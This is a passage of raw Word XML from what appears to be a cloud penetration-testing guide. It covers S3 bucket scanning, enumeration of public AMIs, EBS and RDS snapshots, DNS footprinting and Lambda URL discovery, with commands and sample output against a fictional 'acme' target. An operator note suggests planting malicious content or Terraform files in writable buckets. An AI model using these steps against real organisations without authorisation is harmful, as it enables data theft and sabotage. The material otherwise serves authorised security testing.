          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>acme-dev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>acme-backup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>acme-logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>acme-terraform-state</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>acme-cloudtrail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>acme-config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>acme-website</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>acme-uploads</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>acme-artifacts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>acme-internal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, and every combination with environment suffixes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D5DF52"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s3scanner scan --bucket-file buckets.txt --threads 25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE53756" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[*] Loaded 142 candidate bucket names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5788C378" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[*] Scanning...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BFBBA5"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acme-terraform-state                 -&gt; open (LIST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8E75BE"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acme-cloudtrail-archive              -&gt; open (LIST, GET via prefix)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0647DAD6"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 ] acme-prod-assets                     -&gt; closed (AccessDenied)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA2EAEF"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acme-internal-backup                 -&gt; NO  AUTH  (LIST, GET, PUT, DEL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1B863A"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 xml:space="preserve">[ ] acme-dev                        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">     -&gt; NoSuchBucket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F929C6"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acme-logs                            -&gt; open (LIST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C46E71" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[*] Complete. 4 open buckets, 1 writable. See results/ for details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CDB2E6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:divId w:val="138502880"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>OPERATOR NOTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09551732" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:spacing w:after="216"/>
        <w:divId w:val="138502880"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>writable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> bucket (fourth line above) is a finding. But it is not yet an exploit — you must still demonstrate impact, which may be: uploading malicious content to a bucket that feeds a CloudFront-served site (defacement / malware distribution), putting a Terraform plan file in an active state bucket (supply-chain sabotage), or simply demonstrating the authz gap. The finding severity depends on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>how</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> the bucket is consumed downstream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20679363" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>4.5  Public AMI, snapshot, and RDS enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408DF59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Shared AWS artifacts are indexed by account ID:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211447CD"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ec2 describe-images --owners 111122223333 --executable-users all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22134D0E"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597FD3C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"Images": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ED1E6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7EB49229"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"ImageId": "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ami-0c1a2b3c4d5e6f7a8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70581DF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"Name": "acme-jenkins-prod-2024-04-17",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F81618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"Description": "nightly jenkins rebake",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2187035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"CreationDate": "2024-04-17T02:11:00.000Z",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5398A462"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"OwnerId": "111122223333",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E713C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"Public": </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="r"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EE7A68"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"BlockDeviceMappings": [ ... ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDABBB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755FACA6"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726F4859"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32377BD7"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ec2 describe-snapshots --owner-ids 111122223333 --restorable-by-user-ids all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1596A42D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[... 14 EBS snapshots shared publicly, one named 'db-prod-nightly' ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F25073F"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rds describe-db-snapshots --snapshot-type public --include-public</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A93DEDE" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[... 3 RDS snapshots accessible to all accounts ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D9C27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Three findings from one pass: a public Jenkins AMI (can be launched in your account to recover the disk), a public EBS snapshot of a production database (can be mounted), and a public RDS snapshot that can be copied and restored in the attacker account. All three are available without a single credential belonging to the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E062493" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>4.6  DNS and CDN footprinting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB5F10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DNS patterns give structural clues:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AED2470" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>*.cloudfront.net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> CNAMEs point at distributions; the distribution ID reveals account region and account seed era.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369BB6AD" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>*.elb.amazonaws.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>*.elasticloadbalancing.amazonaws.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> CNAMEs reveal regional ALB/NLB architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBBEA76" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>*.execute-api.&lt;region&gt;.amazonaws.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> identifies API Gateway endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1E5BA6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>*.lambda-url.&lt;region&gt;.on.aws</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> identifies Lambda function URLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AEE4A4" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>*.awsapps.com/start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an IAM Identity Center sign-in portal; the subdomain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> the organization's alias.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258652A7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>*.awsglobalaccelerator.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> hints at global traffic architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1D99C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pass with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>amass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>subfinder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, and a zone-transfer probe (where available) builds a map of the customer's AWS-hosted surface area. Note: DNS zone-walking of Route53-hosted zones requires AWS Trust &amp; Safety notification; conventional NSEC3 walking against the public zone is fair game.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A20BBC" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>4.7  Lambda function URL and API Gateway discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA9295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Lambda function URLs (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>&lt;url-id&gt;.lambda-url.&lt;region&gt;.on.aws</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">) were introduced in 2022 and have become a major attack surface because they are trivial for developers to enable and frequently ship with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AuthType=NONE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>. They are also not enumerable by wordlist in the traditional sense — the URL ID is a random 32-character string. But they do appear in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A342ED" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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JavaScript bundles served from web applications (grep the bundle for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>lambda-url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604B358B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Mobile application binaries (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
